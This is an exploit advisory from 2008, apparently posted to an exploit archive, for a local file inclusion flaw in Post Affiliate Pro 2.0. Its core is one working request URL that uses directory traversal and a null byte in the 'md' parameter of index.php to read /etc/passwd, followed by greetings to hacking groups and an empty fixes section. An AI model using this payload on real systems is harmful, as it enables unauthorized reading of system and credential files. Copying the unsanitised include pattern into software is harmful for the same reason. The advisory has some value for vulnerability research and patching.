Post Affiliate Pro 2.0 (index.php md) Local File Inclusion Vulnerability
2008-10-16 02:01:04=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Software : Post Affiliate Pro v2.0
Vulnrability : Local File Inclusion
Severity : High
Author : ZeN
Date : 16 October 2008
Websites >
http://DUSecurity.com
http://DarkCode.me
PS : You MUST be logged into the system for the exploit to work.
Exploit >
http://site.com/affiliates/index.php?md=../../../../../../../etc/passwd%00
Shouts>
DUSecurity Group
DarkCode
WL-Group
IWannaHack
Milw0rm
EnigmaGroup
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#
Fixes
No fixesIn order to submit a new fix you need to be registered.

